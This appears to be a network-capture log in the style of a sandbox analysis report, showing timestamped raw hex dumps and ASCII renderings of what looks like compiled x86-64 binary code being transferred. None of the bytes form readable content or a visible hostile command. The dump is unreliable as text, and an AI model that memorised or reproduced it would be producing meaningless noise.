                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2241INData Raw: c7 44 24 38 00 00 00 00 31 ff 45 31 e4 4c 89 7c 24 30 4c 89 74 24 68 4c 8b 74 24 40 89 b4 24 f0 00 00 00 48 8b 74 24 48 85 ff 0f 84 ce 00 00 00 83 ff 01 0f 85 26 03 00 00 48 8b 5d 38 bf 01 00 00 00 ba 04 00 00 00 48 89 d9 e8 0c 35 f8 ff 48 63 c7 c7 44 24 3c 00 00 00 00 8b 44 84 70 c7 44 24 5c 00 00 00 00 41 01 c4 89 44 24 60 41 89 c7 41 8d 44 24 fc 44 89 64 24 64 89 44 24 58 0f 1f 44 00 00 45 31 c9 45 31 c0 44 89 fa 48 89 d9 48 8b 84 24 00 01 00 00 48 c7 44 24 20 00 00 00 00 48 89 44 24 28 e8 11 ff 07 00 85 c0 0f 84 cb 01 00 00 45 31 e4 85 ff 75 2d eb 60 41 83 fc 01 74 4a 41 8d 54 24 fe 4c 89 e9 e8 bd db 02 00 48 8b 10 48 89 d9 e8 72 2c f8 ff 85 c0 74 a6 41 83 c4 01 41 39 fc 74 35 45 85 e4 75 d0 48 8b 55 30 eb e0 66 2e 0f 1f 84 00 00 00 00 00 41 89 c4 48
                                                                                                                                                                                                                    Data Ascii: D$81E1L|$0Lt$hLt$@$Ht$H&H]8H5HcD$<DpD$\AD$`AAD$Dd$dD$XDE1E1DHH$HD$ HD$(E1u-`AtJAT$LHHr,tAA9t5EuHU0f.AH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2257INData Raw: 8b 13 c7 00 00 08 00 00 c7 40 10 02 00 00 00 81 3a 90 03 00 00 0f 94 c2 0f b6 d2 8d 54 92 01 89 50 1c 48 8b 15 82 fb 48 00 48 89 50 30 48 89 43 28 48 83 c0 14 48 89 43 40 b8 01 00 00 00 c7 43 48 02 00 00 00 48 83 c4 20 5b c3 31 c0 48 83 c4 20 5b c3 0f 1f 84 00 00 00 00 00 41 55 41 54 56 53 48 83 ec 58 48 8b 01 48 8b 71 28 81 38 90 03 00 00 75 2f 48 8b 41 10 41 bc 01 00 00 00 4c 8b 68 28 49 8b 4d 60 48 85 c9 74 1b 48 8d 54 24 40 4c 8d 4c 24 3c 4c 8d 44 24 48 e8 7c 9e ff ff 85 c0 75 18 45 31 e4 44 89 e0 48 83 c4 58 5b 5e 41 5c 41 5d c3 0f 1f 80 00 00 00 00 4c 89 e9 e8 c8 b8 ff ff 48 8b 4c 24 40 89 c3 e8 cc 4f fc ff 4c 89 e9 29 c3 e8 a2 b8 ff ff 66 0f 6e 54 24 3c 83 e0 07 83 f8 01 66 0f 70 ca e0 0f 94 c0 0f b6 c0 29 c3 39 5c 24 3c 7f 23 f3 0f 7e 44 24 40 44
                                                                                                                                                                                                                    Data Ascii: @:TPHHHP0HC(HHC@CHH [1H [AUATVSHXHHq(8u/HAALh(IM`HtHT$@LL$<LD$H|uE1DHX[^A\A]LHL$@OL)fnT$<fp)9\$<#~D$@D
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2273INData Raw: 00 00 c1 e5 08 45 89 cd 46 33 b4 a0 00 08 00 00 66 41 0f 6e de 41 89 d4 41 c1 ed 08 66 0f 62 c3 66 41 0f 6e d8 41 89 c8 c1 e1 08 41 c1 e8 18 41 31 ca 41 c1 ec 08 66 0f 62 d9 41 31 e8 8d 8a 8d 67 6e de c1 e2 18 66 0f 6c d8 43 8d ac 01 73 98 91 21 41 c1 e1 18 44 29 d1 44 31 ea 45 31 e1 45 8d 84 10 e5 30 23 43 89 eb 40 0f b6 d5 45 29 d1 41 89 ea c1 ed 10 0f b6 df 41 c1 ea 18 40 0f b6 ed 8b 14 90 41 81 e9 e5 30 23 43 42 33 94 90 00 0c 00 00 4c 63 d3 8b 9c a8 00 08 00 00 42 33 94 90 00 04 00 00 41 89 ca 31 d3 0f b6 d1 41 c1 ea 18 66 0f 6e c3 0f b6 dd c1 e9 10 8b 14 90 0f b6 c9 42 33 94 90 00 0c 00 00 4c 63 d3 8b 9c 88 00 08 00 00 42 33 94 90 00 04 00 00 45 89 c2 41 c1 ea 18 31 d3 41 0f b6 d0 89 d9 44 89 c3 8b 14 90 41 c1 e8 10 0f b6 df 42 33 94 90 00 0c 00 00
                                                                                                                                                                                                                    Data Ascii: EF3fAnAAfbfAnAAA1AfbA1gnflCs!AD)D1E1E0#C@E)AA@A0#CB3LcB3A1AfnB3LcB3EA1ADAB3
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2289INData Raw: 45 0f 6f cd 66 0f 7f 50 60 66 44 0f fe e2 66 0f ef d8 66 41 0f 72 d1 1b 66 41 0f ef f2 66 41 0f 6f fe 66 0f 72 f7 1e 66 0f 6f eb 66 45 0f eb c1 66 0f 72 d5 1f 66 44 0f fe e6 66 0f fe db 66 41 0f 72 d6 02 66 45 0f fe e0 66 0f eb dd 66 44 0f eb f7 66 0f ef e1 66 0f 6f 48 a0 66 45 0f 6f c4 66 41 0f 6f f2 66 0f ef 20 66 45 0f fe df 66 41 0f 72 f0 05 66 41 0f ef f5 66 45 0f 6f cc 66 0f 7f 58 70 66 44 0f fe db 66 0f ef e1 66 41 0f 72 d1 1b 66 41 0f ef f6 66 41 0f 6f fd 66 0f 72 f7 1e 66 0f 6f ec 66 45 0f eb c1 66 0f 72 d5 1f 66 44 0f fe de 66 0f fe e4 66 41 0f 72 d5 02 66 45 0f fe d8 66 0f eb e5 66 44 0f eb ef 66 0f ef c2 66 0f 6f 50 b0 66 45 0f 6f c3 66 41 0f 6f f6 66 0f ef 40 10 66 45 0f fe d7 66 41 0f 72 f0 05 66 41 0f ef f4 66 45 0f 6f cb 66 0f 7f 60 80 66
                                                                                                                                                                                                                    Data Ascii: EofP`fDffArfAfAofrfofEfrfDffArfEffDffoHfEofAof fEfArfAfEofXpfDffArfAfAofrfofEfrfDffArfEffDffoPfEofAof@fEfArfAfEof`f
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2305INData Raw: eb c4 41 2d ef d4 c5 cd 72 f2 1e c4 c1 45 eb f8 c5 fd fe c5 c4 c1 35 72 d2 1f c4 41 2d fe d2 c5 ed 72 d2 02 c5 fd fe c7 c4 41 2d eb d1 c5 ed eb d6 c4 41 25 ef dd c5 7d 6f 2b c5 c5 72 f0 05 c4 c1 5d fe e7 c5 e5 ef e9 c5 7d 7f 53 a0 c4 c1 5d fe e2 c5 25 ef 58 c0 c5 bd 72 d0 1b c5 d5 ef ea c4 41 25 ef dd c5 cd 72 f1 1e c4 c1 45 eb f8 c5 dd fe e5 c4 c1 35 72 d3 1f c4 41 25 fe db c5 f5 72 d1 02 c5 dd fe e7 c4 41 25 eb d9 c5 f5 eb ce c4 41 1d ef e6 c5 7d 6f 73 20 c5 c5 72 f4 05 c4 c1 65 fe df c5 ed ef e8 c5 7d 7f 5b c0 c4 c1 65 fe db c5 1d ef 60 e0 c5 bd 72 d4 1b c5 d5 ef e9 c4 41 1d ef e6 c5 cd 72 f0 1e c4 c1 45 eb f8 c5 e5 fe dd c4 c1 35 72 d4 1f c4 41 1d fe e4 c5 fd 72 d0 02 c5 e5 fe df c4 41 1d eb e1 c5 fd eb c6 c4 41 15 ef ea c5 7d 6f 53 40 c5 c5 72 f3 05
                                                                                                                                                                                                                    Data Ascii: A-rE5rA-rA-A%}o+r]}S]%XrA%rE5rA%rA%A}os re}[e`rArE5rArAA}oS@r
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2321INData Raw: 08 c5 f9 ef c4 0f ac c0 07 31 ce 89 ef 03 14 24 c5 f9 ef c1 31 d8 0f a4 ed 05 c5 21 fe cf 01 f2 21 c7 c4 c1 79 ef c0 31 d8 01 ea 0f ac ed 07 31 df c5 b9 72 d0 1e c5 79 7f 4c 24 30 89 d6 03 4c 24 04 31 c5 0f a4 d2 05 c5 f9 72 f0 02 01 f9 21 ee 31 c5 01 d1 0f ac d2 07 31 c6 89 cf 03 5c 24 08 c4 c1 79 eb c0 31 ea 0f a4 c9 05 01 f3 21 d7 31 ea 01 cb 03 44 24 0c 31 ef 89 de 0f a4 db 05 01 f8 31 d6 0f ac c9 07 01 d8 c4 63 79 0f c7 08 c5 f1 ef cd 03 6c 24 10 31 ce 89 c7 0f a4 c0 05 c5 f1 ef ca 01 f5 31 cf c5 21 fe c8 0f ac db 07 01 c5 c4 c1 71 ef c8 03 54 24 14 31 df 89 ee 0f a4 ed 05 c5 b9 72 d1 1e c5 79 7f 0c 24 01 fa 31 de 0f ac c0 07 01 ea c5 f1 72 f1 02 03 4c 24 18 31 c6 89 d7 0f a4 d2 05 01 f1 31 c7 0f ac ed 07 01 d1 c4 c1 71 eb c8 03 5c 24 1c 31 ef 89 ce
                                                                                                                                                                                                                    Data Ascii: 1$1!!y11ryL$0L$1r!11\$y1!1D$11cyl$11!qT$1ry$1rL$11q\$1
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2337INData Raw: 6f cf 66 0f ef fa 66 41 0f 6f d7 66 0f 72 d1 02 66 0f fe f7 66 0f ef c4 66 41 0f 6f e0 66 41 0f 6f ff 66 0f 72 f2 0a 66 41 0f ef e7 66 0f 72 d7 0d 66 0f ef ca 66 0f fe f0 66 0f 72 f2 09 66 0f db dc 66 0f ef cf 66 0f 72 d7 09 66 0f ef ca 66 45 0f 6f f0 66 0f 72 f2 0b 66 0f ef f9 66 44 0f ef f3 66 44 0f fe d6 66 0f ef fa 66 44 0f fe f6 66 44 0f fe f7 66 0f 6f 70 b0 66 0f fe 68 30 66 0f 6f fe 66 0f 6f ce 66 0f 72 d7 03 66 0f 6f d6 66 0f 72 d1 07 66 0f 6f 40 80 66 0f 72 f2 0e 66 0f ef f9 66 0f 72 d1 0b 66 0f 6f d8 66 0f ef fa 66 0f 72 f2 0b 66 0f ef f9 66 0f 72 d0 0a 66 0f 6f cb 66 0f 72 d3 11 66 0f ef fa 66 0f 72 f1 0d 66 0f fe ef 66 0f ef c3 66 0f 72 d3 02 66 0f ef c1 66 0f 72 f1 02 66 0f ef c3 66 0f ef c1 66 0f fe e8 66 41 0f 6f fa 66 41 0f 6f d2 66 0f 72
                                                                                                                                                                                                                    Data Ascii: offAofrfffAofAofrfAfrfffrfffrffEofrffDfDffDfDfopfh0fofofrfofrfo@frffrfoffrffrfofrffrfffrffrffffAofAofr
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2353INData Raw: 4c 8b 26 8b 4e 08 39 d1 0f 4f d1 85 c9 89 0b 4c 0f 4e e5 4c 8b 6e 10 8b 4e 18 39 d1 0f 4f d1 85 c9 89 4b 04 4c 0f 4e ed 4c 8b 76 20 8b 4e 28 39 d1 0f 4f d1 85 c9 89 4b 08 4c 0f 4e f5 4c 8b 7e 30 8b 4e 38 39 d1 0f 4f d1 85 c9 89 4b 0c 4c 0f 4e fd 4c 8b 46 40 8b 4e 48 39 d1 0f 4f d1 85 c9 89 4b 10 4c 0f 4e c5 4c 8b 4e 50 8b 4e 58 39 d1 0f 4f d1 85 c9 89 4b 14 4c 0f 4e cd 4c 8b 56 60 8b 4e 68 39 d1 0f 4f d1 85 c9 89 4b 18 4c 0f 4e d5 4c 8b 5e 70 8b 4e 78 39 d1 0f 4f d1 85 c9 89 4b 1c 4c 0f 4e dd c5 7e 6f 47 80 48 8d 84 24 80 00 00 00 c5 7e 6f 4f a0 48 8d 9c 24 80 01 00 00 c5 7e 6f 57 c0 c5 7e 6f 5f e0 c5 7e 6f 27 c5 7e 6f 6f 20 c5 7e 6f 77 40 c5 7e 6f 7f 60 c5 fe 6f 35 26 2b 00 00 eb 04 0f 1f 40 00 c4 c1 2d ef e1 c4 c1 79 6e 2c 24 c4 c1 79 6e 00 c4 c1 79 6e
                                                                                                                                                                                                                    Data Ascii: L&N9OLNLnN9OKLNLv N(9OKLNL~0N89OKLNLF@NH9OKLNLNPNX9OKLNLV`Nh9OKLNL^pNx9OKLN~oGH$~oOH$~oW~o_~o'~oo ~ow@~o`o5&+@-yn,$ynyn
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2369INData Raw: c1 ce 09 31 df 44 89 64 24 34 41 31 d6 44 21 df 41 c1 cd 05 41 01 cc 31 df 41 c1 ce 0b 45 31 dd 41 01 fc 89 d7 44 03 65 00 41 31 d6 44 31 c7 41 c1 cd 06 44 89 c1 41 21 ff 41 c1 ce 02 45 01 ec 44 31 f9 45 01 e2 44 01 e1 48 8d 6d 04 44 8b 6c 24 3c 44 8b 7c 24 30 45 89 ec 41 c1 cd 0b 44 01 f1 45 89 fe 41 c1 cf 02 45 31 e5 41 c1 ec 03 41 c1 cd 07 45 31 f7 41 c1 ee 0a 41 c1 cf 11 45 31 ec 45 31 f7 44 03 64 24 1c 44 03 64 24 38 45 89 d5 45 01 fc 41 89 ce 41 c1 cd 0e 45 89 df 45 31 d5 41 c1 ce 09 41 31 c7 44 89 64 24 38 41 31 ce 45 21 d7 41 c1 cd 05 41 01 dc 41 31 c7 41 c1 ce 0b 45 31 d5 45 01 fc 41 89 cf 44 03 65 00 41 31 ce 41 31 d7 41 c1 cd 06 89 d3 44 21 ff 41 c1 ce 02 45 01 ec 31 fb 45 01 e1 44 01 e3 48 8d 6d 04 44 8b 2c 24 8b 7c 24 34 45 89 ec 41 c1 cd 0b
                                                                                                                                                                                                                    Data Ascii: 1Dd$4A1D!AA1AE1ADeA1D1ADA!AED1EDHmDl$<D|$0EADEAE1AAE1AAE1E1Dd$Dd$8EEAAEE1AA1Dd$8A1E!AAA1AE1EADeA1A1AD!AE1EDHmD,$|$4EA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2385INData Raw: 00 00 00 48 c7 41 38 00 00 00 00 48 c7 41 40 00 00 00 00 48 c7 41 48 00 00 00 00 48 c7 41 50 00 00 00 00 48 c7 41 58 00 00 00 00 48 c7 41 60 00 00 00 00 c7 41 6c 1c 00 00 00 0f 11 41 10 c3 66 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 6f 05 48 0c 47 00 b8 01 00 00 00 0f 11 01 f3 0f 6f 05 48 0c 47 00 48 c7 41 68 00 00 00 00 48 c7 41 20 00 00 00 00 48 c7 41 28 00 00 00 00 48 c7 41 30 00 00 00 00 48 c7 41 38 00 00 00 00 48 c7 41 40 00 00 00 00 48 c7 41 48 00 00 00 00 48 c7 41 50 00 00 00 00 48 c7 41 58 00 00 00 00 48 c7 41 60 00 00 00 00 c7 41 6c 20 00 00 00 0f 11 41 10 c3 66 66 2e 0f 1f 84 00 00 00 00 00 90 41 55 41 54 55 57 56 53 48 83 ec 28 48 89 ce 49 89 d4 4c 89 c3 4d 85 c0 0f 84 19 01 00 00 8b 51 24 44 89 c5 42 8d 04 c5 00 00 00 00 03 41 20 73 06 83 c2 01
                                                                                                                                                                                                                    Data Ascii: HA8HA@HAHHAPHAXHA`AlAff.oHGoHGHAhHA HA(HA0HA8HA@HAHHAPHAXHA`Al Aff.AUATUWVSH(HILMQ$DBA s
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2401INData Raw: 1f 40 00 45 31 ed eb e3 0f 1f 00 41 57 41 56 41 55 41 54 48 83 ec 38 45 31 f6 48 8b 84 24 90 00 00 00 48 89 44 24 28 48 8b 84 24 88 00 00 00 49 89 cd 4d 89 c7 4d 89 c8 4c 8b 8c 24 80 00 00 00 48 89 d1 4c 89 ea 48 89 44 24 20 e8 6b fd ff ff 49 89 c4 48 85 c0 74 11 49 89 c0 4c 89 fa 4c 89 e9 e8 85 f5 ff ff 41 89 c6 4c 89 e1 e8 3a 9d f5 ff 44 89 f0 48 83 c4 38 41 5c 41 5d 41 5e 41 5f c3 66 2e 0f 1f 84 00 00 00 00 00 41 56 41 55 41 54 53 48 83 ec 38 4c 89 44 24 70 45 31 c0 4c 89 cb e8 55 a4 f5 ff 49 89 c4 48 85 c0 74 4d 48 8b 8c 24 80 00 00 00 48 89 c2 e8 dd f1 ff ff 48 8d 54 24 70 48 89 c1 49 89 c5 e8 dd 4b f7 ff 85 c0 78 59 89 03 41 be 01 00 00 00 4c 89 e9 e8 39 4c f7 ff 4c 89 e1 e8 c1 9c f5 ff 44 89 f0 48 83 c4 38 5b 41 5c 41 5d 41 5e c3 66 90 c7 44 24 20
                                                                                                                                                                                                                    Data Ascii: @E1AWAVAUATH8E1H$HD$(H$IMML$HLHD$ kIHtILLAL:DH8A\A]A^A_f.AVAUATSH8LD$pE1LUIHtMH$HHT$pHIKxYAL9LLDH8[A\A]A^fD$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2417INData Raw: 5c 41 5d c3 0f 1f 80 00 00 00 00 41 56 41 55 41 54 48 83 ec 20 4c 8d 35 d2 92 46 00 41 b8 11 01 00 00 4c 89 f2 49 89 cd b9 28 00 00 00 e8 49 a0 fa ff 49 89 c4 48 85 c0 74 50 e8 0c 11 00 00 49 89 04 24 48 85 c0 74 53 e8 fe 10 00 00 49 89 44 24 08 48 85 c0 74 44 49 c7 44 24 20 00 00 00 00 66 0f ef c0 41 0f 11 44 24 10 4d 85 ed 74 1b 41 b8 1d 01 00 00 4c 89 f2 4c 89 e9 e8 8b 75 fb ff 49 89 44 24 10 48 85 c0 74 39 4c 89 e0 48 83 c4 20 41 5c 41 5d 41 5e c3 0f 1f 00 4c 89 e1 41 b8 17 01 00 00 4c 89 f2 45 31 e4 e8 9c 9f fa ff 4c 89 e0 48 83 c4 20 41 5c 41 5d 41 5e c3 66 0f 1f 44 00 00 49 8b 0c 24 e8 4f 1b 00 00 49 8b 4c 24 08 e8 45 1b 00 00 4c 89 e1 4c 89 f2 45 31 e4 41 b8 20 01 00 00 e8 61 9f fa ff eb 9e 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 41 55 41 54
                                                                                                                                                                                                                    Data Ascii: \A]AVAUATH L5FALI(IIHtPI$HtSID$HtDID$ fAD$MtALLuID$Ht9LH A\A]A^LALE1LH A\A]A^fDI$OIL$ELLE1A aff.@AUAT
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2433INData Raw: 44 00 00 31 f6 48 8d 3d 17 54 46 00 eb 23 0f 1f 44 00 00 48 8b 4b 18 48 89 c2 e8 ec 47 00 00 41 89 c5 85 c0 74 b7 4c 89 e1 83 c6 01 e8 da 17 01 00 49 89 f9 45 31 c0 31 d2 4c 89 f1 e8 ea cb fb ff 49 89 c4 48 85 c0 75 ca e8 2d 3e f8 ff 25 ff 0f 00 00 83 f8 6c 75 04 85 f6 75 7f c7 44 24 20 61 00 00 00 4c 8d 0d a2 53 46 00 41 b8 09 00 00 00 45 31 ed ba 6f 00 00 00 b9 0b 00 00 00 e8 68 33 f8 ff e9 55 ff ff ff 0f 1f 00 c7 44 24 20 54 00 00 00 4c 8d 0d 73 53 46 00 41 b8 02 00 00 00 ba 6f 00 00 00 b9 0b 00 00 00 45 31 e4 45 31 ed e8 36 33 f8 ff e9 23 ff ff ff 90 c7 44 24 20 78 00 00 00 4c 8d 0d 43 53 46 00 41 b8 64 00 00 00 eb ce 66 0f 1f 84 00 00 00 00 00 e8 fb 33 f8 ff 41 89 f5 e9 f5 fe ff ff 0f 1f 00 c7 44 24 20 70 00 00 00 4c 8d 0d 13 53 46 00 41 b8 0d 00 00
                                                                                                                                                                                                                    Data Ascii: D1H=TF#DHKHGAtLIE11LIHu->%luuD$ aLSFAE1oh3UD$ TLsSFAoE1E163#D$ xLCSFAdf3AD$ pLSFA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2449INData Raw: 28 48 89 cb 48 89 d6 48 85 c9 74 0c 48 89 d1 e8 97 8a 00 00 85 c0 75 13 31 c0 48 83 c4 28 5b 5e c3 66 2e 0f 1f 84 00 00 00 00 00 8b 03 83 f8 01 74 31 83 f8 02 74 1c b8 01 00 00 00 c7 03 02 00 00 00 48 89 73 08 48 83 c4 28 5b 5e c3 66 0f 1f 44 00 00 48 8b 4b 08 e8 1f b4 00 00 eb d9 0f 1f 44 00 00 48 8b 4b 08 e8 9f d7 00 00 eb c9 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 45 31 c9 e9 b8 f3 ff ff 0f 1f 84 00 00 00 00 00 41 54 48 83 ec 20 45 31 c9 49 89 cc e8 9f f3 ff ff 89 c2 83 f8 ff 74 18 4c 89 e1 48 83 c4 20 41 5c e9 da 9b ff ff 66 2e 0f 1f 84 00 00 00 00 00 31 c0 48 83 c4 20 41 5c c3 0f 1f 80 00 00 00 00 48 8b 41 08 c3 66 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 41 55 41 54 57 56 53 48 83 ec 40 4c 8b 29 49 89 ce 48 89 d3 4d 85 ed 0f 84 a9 00 00 00 49 8b 8d
                                                                                                                                                                                                                    Data Ascii: (HHHtHu1H([^f.t1tHsH([^fDHKDHKff.fE1ATH E1ItLH A\f.1H A\HAff.AWAVAUATWVSH@L)IHMI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2465INData Raw: c0 0f 84 b8 03 00 00 48 83 38 00 0f 84 ae 03 00 00 66 2e 0f 1f 84 00 00 00 00 00 8b 54 24 28 39 54 24 2c 0f 8f 82 fd ff ff 75 50 48 8b 7c 24 30 48 85 ff 74 46 48 89 f1 e8 9e 4a 00 00 48 89 f9 48 89 c3 e8 93 4a 00 00 48 8b 54 24 58 48 8b 4c 24 60 49 89 d9 49 89 c0 e8 9e 9b 03 00 85 c0 0f 84 46 fd ff ff 8b 54 24 78 85 d2 0f 8e a1 02 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 8b 44 24 38 48 89 74 24 30 48 89 44 24 48 8b 44 24 40 89 44 24 44 8b 44 24 28 89 44 24 2c e9 0c fd ff ff 0f 1f 40 00 48 83 be a0 00 00 00 00 0f 85 fa fc ff ff e9 c3 fb ff ff 0f 1f 44 00 00 48 8b 74 24 30 48 85 f6 0f 84 4c 01 00 00 48 8b 84 24 d8 00 00 00 48 89 f5 48 8b 08 e8 9f 73 00 00 48 8b 94 24 d8 00 00 00 48 89 e9 48 89 32 48 8b b4 24 e8 00 00 00 48 8b 54 24 48 48 89 16 48 8b b4 24 f0
                                                                                                                                                                                                                    Data Ascii: H8f.T$(9T$,uPH|$0HtFHJHHJHT$XHL$`IIFT$xf.HD$8Ht$0HD$HD$@D$DD$(D$,@HDHt$0HLH$HHsH$HH2H$HT$HHH$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2481INData Raw: 48 89 ea e8 73 1b ff ff 48 c7 46 30 00 00 00 00 48 8b 4b 30 48 85 c9 74 1c 49 89 e8 48 8d 15 58 f8 ff ff e8 73 0f ff ff 48 89 46 30 48 85 c0 0f 84 72 ff ff ff 4c 8b 6b 48 4d 85 ed 74 1d 85 ff 0f 84 d3 fc ff ff 48 8b 6b 50 45 31 e4 e9 70 fe ff ff 66 0f 1f 84 00 00 00 00 00 4c 8b 63 58 4d 85 e4 0f 84 d0 fc ff ff 85 ff 0f 84 bd fc ff ff 48 8b 7b 60 48 f7 c7 fb ff ff ff 0f 84 bf fe ff ff 48 83 ff 10 0f 84 b5 fe ff ff 31 c0 e9 17 ff ff ff 66 0f 1f 84 00 00 00 00 00 0b 53 14 89 56 14 48 8b 53 28 e9 28 fc ff ff 90 89 56 18 e9 ca fc ff ff 0f 1f 84 00 00 00 00 00 89 4e 1c 83 fa ff 0f 85 cd fc ff ff 8b 53 24 83 fa ff 0f 85 d2 fc ff ff e9 bd fb ff ff 0f 1f 00 31 ff e9 b0 fb ff ff 66 0f 1f 84 00 00 00 00 00 48 85 d2 0f 85 0c fc ff ff e9 17 fc ff ff 66 90 4c 8b 6b 48
                                                                                                                                                                                                                    Data Ascii: HsHF0HK0HtIHXsHF0HrLkHMtHkPE1pfLcXMH{`HH1fSVHS((VNS$1fHfLkH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2497INData Raw: fe ff 85 c0 75 3a 41 c7 44 24 20 00 00 00 00 48 8b 4c 24 50 48 8d 15 c0 f7 ff ff e8 5b db fe ff 48 8b 44 24 48 41 c7 44 24 08 00 00 00 00 4d 89 65 00 48 89 45 00 b8 01 00 00 00 e9 db fe ff ff 4c 89 e1 e8 13 f9 ff ff 85 c0 0f 84 fa fe ff ff eb bd 66 0f 1f 84 00 00 00 00 00 41 55 41 54 55 57 56 53 48 83 ec 48 48 8b 31 8b 46 08 48 89 d5 85 c0 75 37 48 8b 46 10 4c 8b 00 45 89 c4 48 85 ed 74 17 49 63 d8 48 8b 4d 00 48 8b 50 08 49 89 d8 e8 ad d1 1c 00 48 01 5d 00 44 89 e0 48 83 c4 48 5b 5e 5f 5d 41 5c 41 5d c3 90 48 c7 44 24 30 00 00 00 00 e8 92 d0 fe ff 48 89 44 24 30 48 89 c1 48 85 c0 0f 84 3e 01 00 00 bf ff ff ff ff 31 db 45 31 ed eb 58 0f 1f 44 00 00 48 8b 0e 89 da e8 a6 db fe ff 49 89 c4 39 78 10 74 2b e8 59 d0 fe ff 49 89 c5 48 85 c0 0f 84 05 01 00 00 48
                                                                                                                                                                                                                    Data Ascii: u:AD$ HL$PH[HD$HAD$MeHELfAUATUWVSHHH1FHu7HFLEHtIcHMHPIH]DHH[^_]A\A]HD$0HD$0HH>1E1XDHI9xt+YIHH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2513INData Raw: 01 00 00 0f b6 4e 0e 38 4b 0e 0f 85 1e 01 00 00 83 ff 10 0f 85 97 01 00 00 0f b6 4e 0f ba 0f 00 00 00 38 4b 0f 0f 45 fa 48 98 eb 1a 0f 1f 80 00 00 00 00 80 3c 06 ff 75 15 48 83 e8 01 83 f8 ff 0f 84 95 00 00 00 80 3c 03 00 89 c2 74 e5 39 d7 7c 69 0f 8f 83 00 00 00 48 63 c7 44 0f b6 04 03 0f b6 0c 06 44 89 c2 31 ca 80 fa 1f 77 1d b8 ff ff ff ff 41 38 c8 74 36 4c 8d 0d c4 37 45 00 0f b6 c2 49 63 04 81 4c 01 c8 ff e0 80 fa 3f 74 3b 80 fa 7f 75 26 b8 01 00 00 00 41 84 d0 75 1c 21 d1 8d 04 f8 38 ca ba ff ff ff ff 0f 45 c2 48 83 c4 20 5b 5e 5f c3 0f 1f 44 00 00 b8 ff ff ff ff 48 83 c4 20 5b 5e 5f c3 0f 1f 00 b8 02 00 00 00 eb c8 66 0f 1f 84 00 00 00 00 00 8d 04 fd 00 00 00 00 48 83 c4 20 5b 5e 5f c3 b8 05 00 00 00 eb a9 b8 04 00 00 00 eb a2 b8 03 00 00 00 eb 9b
                                                                                                                                                                                                                    Data Ascii: N8KN8KEH<uH<t9|iHcDD1wA8t6L7EIcL?t;u&Au!8EH [^_DH [^_fH [^_
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2529INData Raw: ff 66 2e 0f 1f 84 00 00 00 00 00 c7 44 24 20 a1 01 00 00 4c 8d 0d b9 fd 44 00 41 b8 74 00 00 00 45 31 f6 ba a1 00 00 00 b9 22 00 00 00 e8 b9 b3 f6 ff e9 87 fe ff ff 0f 1f 40 00 c7 44 24 20 b4 01 00 00 e9 53 fe ff ff 48 8b 40 08 45 31 f6 48 8b 50 08 48 8b 08 e8 30 4c f2 ff 85 c0 0f 8e 57 ff ff ff e9 56 fe ff ff 0f 1f 00 4c 8d 0d f9 fe 44 00 e9 14 b2 f2 ff 0f 1f 40 00 4c 8d 05 e9 fe 44 00 e9 84 c3 f2 ff 0f 1f 40 00 48 8d 0d d9 fe 44 00 e9 d4 da f2 ff 0f 1f 40 00 48 8d 15 c9 fe 44 00 e9 b4 cc f2 ff 0f 1f 40 00 4c 8d 0d 79 fe 44 00 e9 d4 b1 f2 ff 0f 1f 40 00 4c 8d 05 69 fe 44 00 e9 44 c3 f2 ff 0f 1f 40 00 48 8d 0d 59 fe 44 00 e9 94 da f2 ff 0f 1f 40 00 48 8d 15 49 fe 44 00 e9 74 cc f2 ff 0f 1f 40 00 4c 8d 0d f9 fd 44 00 e9 94 b1 f2 ff 0f 1f 40 00 4c 8d 05 e9
                                                                                                                                                                                                                    Data Ascii: f.D$ LDAtE1"@D$ SH@E1HPH0LWVLD@LD@HD@HD@LyD@LiDD@HYD@HIDt@LD@L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2545INData Raw: 45 31 e4 45 31 ff e9 a9 fe ff ff 45 31 e4 45 31 ff eb c4 0f 1f 84 00 00 00 00 00 4c 8d 0d e9 c9 44 00 e9 64 72 f2 ff 0f 1f 40 00 4c 8d 05 d9 c9 44 00 e9 d4 83 f2 ff 0f 1f 40 00 48 8d 0d c9 c9 44 00 e9 24 9b f2 ff 0f 1f 40 00 48 8d 15 b9 c9 44 00 e9 04 8d f2 ff 0f 1f 40 00 4c 8d 0d 69 c9 44 00 e9 24 72 f2 ff 0f 1f 40 00 4c 8d 05 59 c9 44 00 e9 94 83 f2 ff 0f 1f 40 00 48 8d 0d 49 c9 44 00 e9 e4 9a f2 ff 0f 1f 40 00 4c 8d 0d f9 c8 44 00 e9 f4 71 f2 ff 0f 1f 40 00 4c 8d 05 e9 c8 44 00 e9 64 83 f2 ff 0f 1f 40 00 48 8d 0d d9 c8 44 00 e9 b4 9a f2 ff 0f 1f 40 00 48 8d 15 c9 c8 44 00 e9 94 8c f2 ff 0f 1f 40 00 4c 8d 0d 79 c8 44 00 e9 b4 71 f2 ff 0f 1f 40 00 4c 8d 05 69 c8 44 00 e9 24 83 f2 ff 0f 1f 40 00 48 8d 0d 59 c8 44 00 e9 74 9a f2 ff 0f 1f 40 00 48 8d 15 49
                                                                                                                                                                                                                    Data Ascii: E1E1E1E1LDdr@LD@HD$@HD@LiD$r@LYD@HID@LDq@LDd@HD@HD@LyDq@LiD$@HYDt@HI
